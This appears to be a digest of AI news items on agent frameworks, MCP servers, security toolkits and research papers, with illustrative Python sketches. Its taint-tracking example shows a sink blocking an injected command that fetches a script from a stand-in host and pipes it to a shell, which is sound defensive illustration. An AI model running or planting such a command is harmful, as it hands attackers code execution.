LangChain: The Agent Engineering Platform for LLM Applications
LangChain is an open-source Python framework designed for building and deploying LLM-powered applications and agents. It provides tools for chaining interoperable components and integrating with a wide range of data sources and models, and it supports both rapid prototyping and production needs such as monitoring and debugging.
Origin: A Local-First Rust Daemon for AI Agent Memory and Context Management
Origin is a local-first Rust daemon designed to manage AI agent memory and context. It features Git-versioned memories, distilled wiki pages, and supports sessions for various AI clients like Claude Code, Cursor, and Codex, aiming to provide persistent context across AI workflows.
CUA: Open-Source Infrastructure for Desktop-Controlling AI Agents
CUA is an open-source project providing infrastructure for developing, training, and evaluating AI agents capable of controlling full desktop environments across macOS, Linux, and Windows. It includes sandboxes, SDKs, and benchmarks to facilitate the creation of computer-use agents.
Boxlite: A Compute Substrate for AI Agents
Boxlite is a new compute substrate designed for AI agents. It aims to be lightweight for local development and scalable for cloud deployment, offering a flexible environment for building and running AI agents.
Wide-Moat's Open-Source MCP Server for LLM-Powered Computing
Wide-Moat has released an open-source Model Context Protocol (MCP) server designed to give Large Language Models (LLMs) their own managed computing environments. This self-hosted solution offers Docker workspaces with integrated browser, terminal, and code execution capabilities, enabling LLMs to perform complex tasks autonomously.
Cordum: Open Agent Control Plane for Governing Autonomous AI Agents
Cordum introduces an open-source agent control plane designed to govern autonomous AI agents. It provides features for pre-execution policy enforcement, approval gates, and audit trails, aiming to enhance the safety and manageability of AI agent deployments.
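To illustrate the general pattern of pre-execution policy enforcement with an approval gate and an audit trail, here is a minimal sketch. It assumes a simple default-deny rule table keyed on tool names. The `Decision`, `Policy`, and `gate` names and the tool names are hypothetical and do not represent Cordum's actual API or policy language.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable


class Decision(Enum):
    ALLOW = "allow"
    DENY = "deny"
    REQUIRE_APPROVAL = "require_approval"


@dataclass
class Policy:
    # Hypothetical rule table mapping a tool name to a decision.
    rules: dict[str, Decision] = field(default_factory=dict)

    def evaluate(self, tool: str) -> Decision:
        # Default-deny: tools with no rule are blocked before they run.
        return self.rules.get(tool, Decision.DENY)


def gate(policy: Policy, tool: str, approver: Callable[[str], bool], audit_log: list) -> bool:
    """Check a tool call against the policy before execution and record the outcome."""
    decision = policy.evaluate(tool)
    if decision is Decision.REQUIRE_APPROVAL:
        allowed = approver(tool)  # e.g. a human reviewer approving or rejecting the call
    else:
        allowed = decision is Decision.ALLOW
    audit_log.append({"tool": tool, "decision": decision.value, "allowed": allowed})
    return allowed


policy = Policy({"read_file": Decision.ALLOW, "send_email": Decision.REQUIRE_APPROVAL})
log: list = []
print(gate(policy, "read_file", lambda t: False, log))   # True
print(gate(policy, "send_email", lambda t: False, log))  # False: approver declined
print(gate(policy, "delete_repo", lambda t: True, log))  # False: no rule, default deny
```

Defaulting to deny means an agent cannot reach a tool that nobody wrote a rule for, and the approver is consulted only for calls the policy explicitly marks as needing review.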
Notion MCP Server: Integrating AI Agents with Notion
A new open-source project, the Notion MCP Server, enables AI agents to interact with Notion data. It supports various AI models and allows access to Notion pages, databases, and files.
Google's ADK-Python: An Open-Source Toolkit for AI Agent Development
Google has released ADK-Python, an open-source, code-first Python toolkit designed for building, evaluating, and deploying AI agents. The toolkit, currently at version 2.1.0, emphasizes flexibility and control in agent development and includes a graph-based execution engine for workflows and a structured Task API for agent-to-agent delegation.
Hermes Katana: A Defense-in-Depth Security Toolkit for LLM Agents
Hermes Katana is a Python-based security toolkit designed for LLM agents, offering defense-in-depth capabilities including taint tracking, a proxy secret guard, a policy engine, and red-team benchmarking. It aims to protect AI agents from various attacks like prompt injection and unauthorized command execution.
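Taint tracking, one of the layers listed above, labels data from untrusted sources and blocks it when it reaches a dangerous sink. The following minimal sketch shows the idea in plain Python. It assumes a `str` subclass as the label and a command runner as the sink. The names `Tainted`, `TaintError`, and `run_command` are hypothetical and are not Hermes Katana's API.

```python
class Tainted(str):
    """A str that remembers which untrusted source it came from."""

    def __new__(cls, value: str, source: str):
        obj = super().__new__(cls, value)
        obj.source = source
        return obj

    def __add__(self, other):
        if not isinstance(other, str):
            return NotImplemented
        # Concatenation keeps the taint label.
        return Tainted(str.__add__(self, other), self.source)

    def __radd__(self, other):
        # Called for "plain" + tainted, because Tainted subclasses str.
        if not isinstance(other, str):
            return NotImplemented
        return Tainted(str.__add__(other, self), self.source)


class TaintError(Exception):
    pass


def run_command(cmd: str) -> str:
    """Sink: refuse any command that carries untrusted data."""
    if isinstance(cmd, Tainted):
        raise TaintError(f"blocked: command contains data from {cmd.source}")
    return f"would execute: {cmd}"  # stand-in; nothing is actually executed


page_text = Tainted("; curl evil.example | sh", source="web_page")
try:
    run_command("ls " + page_text)
except TaintError as err:
    print(err)  # blocked: command contains data from web_page
print(run_command("ls -la"))  # would execute: ls -la
```

The sketch propagates taint only through `+`. f-strings, `str.format`, `join`, and slicing all return plain strings and silently drop the label, so a real tracker has to cover every such operation.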
wshobson/agents: A Multi-Harness Agentic Plugin Marketplace for AI Code Assistants
The wshobson/agents GitHub repository presents a multi-harness agentic plugin marketplace designed for various AI code assistants, including Claude Code, Codex CLI, Cursor, OpenCode, and Gemini CLI. It offers a collection of plugins, agents, skills, and commands from a single Markdown source, generating native artifacts for each supported harness.
AI-Powered CesiumJS 3D Globe Control with Model Context Protocol
A GitHub project, cesium-mcp, offers AI-powered control for CesiumJS 3D globes. It utilizes the Model Context Protocol (MCP) to enable natural language commands for managing camera, entities, layers, animation, and spatial analysis within 3D GIS environments.
Swarm Orchestrator v10.0.0: AI-Generated PR Audit and Merge Gate
Swarm Orchestrator v10.0.0 introduces `swarm audit`, a new subcommand and GitHub Action designed to audit pull-request diffs for ten categories of AI-coding-agent 'cheat patterns'. It can block merges if blocking findings are detected and generates hash-chained audit ledgers and AI-BOM artifacts.
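A hash-chained ledger makes after-the-fact edits detectable, because each entry's hash covers the previous entry's hash. The following minimal sketch shows the general technique using SHA-256 over canonical JSON. The entry layout, the function names, and the finding labels are hypothetical and are not Swarm Orchestrator's ledger format.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(prev_hash: str, record: dict) -> str:
    # sort_keys gives a canonical encoding so the hash is reproducible.
    payload = json.dumps({"prev": prev_hash, "record": record}, sort_keys=True)
    return hashlib.sha256(payload.encode("utf-8")).hexdigest()


def append_entry(ledger: list, record: dict) -> dict:
    """Append a record whose hash commits to the whole chain before it."""
    prev_hash = ledger[-1]["hash"] if ledger else GENESIS
    entry = {"prev": prev_hash, "record": record, "hash": _digest(prev_hash, record)}
    ledger.append(entry)
    return entry


def verify(ledger: list) -> bool:
    """Recompute every link; any edited or reordered entry breaks the chain."""
    prev_hash = GENESIS
    for entry in ledger:
        if entry["prev"] != prev_hash or entry["hash"] != _digest(prev_hash, entry["record"]):
            return False
        prev_hash = entry["hash"]
    return True


ledger: list = []
append_entry(ledger, {"finding": "test-deleted", "blocking": True})
append_entry(ledger, {"finding": "none", "blocking": False})
print(verify(ledger))  # True
ledger[0]["record"]["blocking"] = False  # tamper with an earlier entry
print(verify(ledger))  # False
```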
Mitigating Perceptual Judgment Bias in Multimodal LLM-as-a-Judge
Researchers have identified and analyzed "Perceptual Judgment Bias" in multimodal large language models (MLLMs) when used as evaluators. This bias causes MLLMs to prioritize plausible textual narratives over perceptually accurate visual evidence. To address this, they introduced the Perceptually Perturbed Judgment Dataset and a unified training framework that combines Group Relative Policy Optimization (GRPO)-based rewards with a batch-ranking objective, aiming to improve perceptual fidelity and alignment with human evaluation.
LocateAnything: Fast and High-Quality Vision-Language Grounding with Parallel Box Decoding
LocateAnything is a new framework for vision-language grounding and detection that uses Parallel Box Decoding (PBD) to improve both speed and accuracy. Unlike traditional methods that decode 2D boxes token by token, PBD decodes geometric elements as atomic units in a single step, enhancing parallelism and preserving geometric coherence. The framework is supported by LocateAnything-Data, a large dataset with over 138 million training samples.
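The difference in sequential steps can be sketched with stub predictors. This example assumes that "single step" means one decoding step per box: token-by-token decoding emits x1, y1, x2, y2 separately, while a PBD-style decoder emits all four coordinates jointly. The predictors here are hypothetical stand-ins, not LocateAnything's model.

```python
from typing import Callable, List, Tuple

Box = Tuple[float, float, float, float]


def decode_token_by_token(predict_coord: Callable[[List[float]], float], num_boxes: int):
    """Baseline: four sequential steps per box, one per coordinate."""
    boxes: List[Box] = []
    steps = 0
    for _ in range(num_boxes):
        coords: List[float] = []
        for _ in range(4):
            # Each coordinate is conditioned on those already emitted for this box.
            coords.append(predict_coord(coords))
            steps += 1
        boxes.append((coords[0], coords[1], coords[2], coords[3]))
    return boxes, steps


def decode_box_atomic(predict_box: Callable[[List[Box]], Box], num_boxes: int):
    """PBD-style: one step per box, with all four coordinates predicted jointly."""
    boxes: List[Box] = []
    steps = 0
    for _ in range(num_boxes):
        boxes.append(predict_box(boxes))
        steps += 1
    return boxes, steps


_, sequential_steps = decode_token_by_token(lambda prefix: 0.5, num_boxes=3)
_, atomic_steps = decode_box_atomic(lambda prev: (0.1, 0.2, 0.6, 0.8), num_boxes=3)
print(sequential_steps, atomic_steps)  # 12 3
```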
Anthropic Announces Claude Fable 5
Anthropic announced Claude Fable 5 alongside Claude Mythos 5, with expanded capabilities for coding, knowledge-intensive tasks, and practical developer workflows. The model also appears in the OpenRouter model listing, making it visible beyond Anthropic's own channels. The launch continues Anthropic's rapid model iteration, with a focus on supporting production-grade AI applications.
NewtPhys: A New Benchmark for Newtonian Physics Understanding in Foundation Models
Researchers have introduced NewtPhys, a 4D physically annotated dataset designed to evaluate foundation models' understanding of low-level Newtonian physics. The dataset, built from multiview images of real-world scenes with physics-grounded simulations, provides detailed annotations including 3D forces and per-pixel quantities. Initial evaluations using NewtPhys on 56 Vision-Language Models (VLMs) and 10 Vision Foundation Models (VFMs) revealed limitations in their physics reasoning capabilities.
SpatialBench: A New Benchmark for Spatial Foundation Models
Researchers have introduced SpatialBench, a new benchmark designed to holistically assess the generalization capabilities of spatial foundation models across diverse tasks, viewpoints, scene domains, and input densities. The benchmark evaluates 41 models across 19 datasets and 546 scenes, revealing that current models are not yet "all-round players" and highlighting the importance of domain alignment and data quality over simple dataset scaling.
SOCO: A New Benchmark for Semantic Object Correspondence in Vision Foundation Models
Researchers have introduced SOCO, a new benchmark designed to evaluate Semantic Object Correspondence (SC) in vision foundation models and large vision-language models (LVLMs). SOCO provides a taxonomy of correspondence types and over 1 million keypoint annotations across 100 categories, including language descriptions for part-level understanding.
Cohere Introduces North Mini Code: A New Model Tailored for Developers
Cohere has announced North Mini Code, its first model specifically designed for developers. This new model aims to provide enhanced capabilities for coding tasks and development workflows.
MemoryVLA++: Enhancing Vision-Language-Action Models with Temporal Memory and Imagination for Robotics
Researchers have introduced MemoryVLA++, a framework designed to improve Vision-Language-Action (VLA) models for robotic manipulation by incorporating temporal modeling. This approach equips VLA models with mechanisms for memory and imagination, inspired by cognitive science, to better handle long-horizon and temporally dependent tasks.
OpenAI Proposes Industrial Policy for the AI Era
OpenAI has published a paper outlining ambitious, people-first industrial policy ideas for the age of advanced artificial intelligence. The proposals focus on expanding opportunities, sharing prosperity, and building resilient institutions.
PAR3D: A Unified 3D-MLLM for Part-Aware Scene Understanding
Researchers have introduced PAR3D, a unified 3D Multimodal Large Language Model (3D-MLLM) framework designed to enhance 3D scene understanding by focusing on fine-grained part structures in addition to objects. This approach aims to improve embodied interaction with 3D environments.
Causally Evaluating the Learnability of Formal Language Tasks
Researchers propose a new methodology for evaluating the learnability of tasks in language models, moving beyond standard correlational analysis. By using formal languages derived from probabilistic finite automata, they introduce the 'binning semiring' to causally control data frequency and measure learnability. This approach aims to address the inherent flaws in correlational evaluations, which can lead to incorrect conclusions.
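As background for the semiring framing, this sketch runs the standard forward algorithm over a toy probabilistic finite automaton (PFA) with a pluggable semiring. It shows the probability semiring (sum, product), which gives a string's total probability, and the Viterbi semiring (max, product), which gives the probability of its best path. It does not implement the paper's binning semiring, whose definition is not given here. The automaton and all names are illustrative.

```python
import operator

# A semiring here is (plus, times, zero); weights are non-negative floats.
PROBABILITY = (operator.add, operator.mul, 0.0)  # total probability of a string
VITERBI = (max, operator.mul, 0.0)               # probability of the single best path


def forward(pfa: dict, string: str, semiring=PROBABILITY) -> float:
    plus, times, zero = semiring
    alpha = dict(pfa["init"])  # alpha[q]: weight of reading the prefix and ending in q
    for sym in string:
        nxt: dict = {}
        for q, w in alpha.items():
            for q2, t in pfa["trans"].get((q, sym), {}).items():
                nxt[q2] = plus(nxt.get(q2, zero), times(w, t))
        alpha = nxt
    total = zero
    for q, w in alpha.items():
        total = plus(total, times(w, pfa["final"].get(q, zero)))
    return total


# Toy PFA: outgoing transition and stopping probabilities of each state sum to 1.
example_pfa = {
    "init": {0: 1.0},
    "trans": {(0, "a"): {0: 0.2, 1: 0.1}, (0, "b"): {1: 0.2}, (1, "b"): {1: 0.6}},
    "final": {0: 0.5, 1: 0.4},
}
print(forward(example_pfa, "ab"))           # about 0.04 (two paths: 0.016 + 0.024)
print(forward(example_pfa, "ab", VITERBI))  # about 0.024 (best path only)
```

Swapping the semiring changes what quantity the same dynamic program aggregates, which is what makes semirings a natural tool for controlling and measuring statistics of a formal language.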
DistIL: Reinforcement Learning from Rich Feedback with Distributional DAgger
Researchers have introduced DistIL, a new approach to reinforcement learning that leverages rich feedback beyond simple binary rewards. DistIL uses a distributional variant of the DAgger imitation learning algorithm with a forward cross-entropy objective, which allows for more effective credit assignment and guarantees monotonic policy improvement. This method has shown empirical improvements over traditional RL from verifiable rewards (RLVR) and self-distillation baselines in tasks like scientific reasoning, coding, and complex mathematical problem-solving.
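The core loss of a distributional DAgger step can be sketched as follows. States come from the learner's own rollouts, as in DAgger, and at each state the learner is trained toward the teacher's full next-token distribution with forward cross-entropy, H(p_teacher, p_student). This is a minimal illustration under those assumptions. How DistIL obtains the teacher distribution from rich feedback is not modeled, and the `teacher` and `student` callables are hypothetical.

```python
import math
from typing import Callable, Sequence


def forward_cross_entropy(teacher_probs: Sequence[float], student_logits: Sequence[float]) -> float:
    """H(p_teacher, p_student) = -sum_v p_teacher(v) * log p_student(v)."""
    m = max(student_logits)  # subtract the max for a numerically stable log-softmax
    log_z = m + math.log(sum(math.exp(l - m) for l in student_logits))
    return -sum(p * (l - log_z) for p, l in zip(teacher_probs, student_logits) if p > 0)


def distributional_dagger_loss(
    student_states: Sequence[object],
    teacher: Callable[[object], Sequence[float]],
    student: Callable[[object], Sequence[float]],
) -> float:
    """Average the loss over states visited by the student, not the teacher."""
    losses = [forward_cross_entropy(teacher(s), student(s)) for s in student_states]
    return sum(losses) / len(losses)


# Hypothetical two-token vocabulary: confident teacher, uniform (zero-logit) student.
print(distributional_dagger_loss(["s0", "s1"], lambda s: [0.9, 0.1], lambda s: [0.0, 0.0]))
# equals ln 2, about 0.693
```

Because the target is a full distribution rather than a single sampled reward, every token in the vocabulary receives a gradient signal at every visited state, which is one way richer feedback can improve credit assignment.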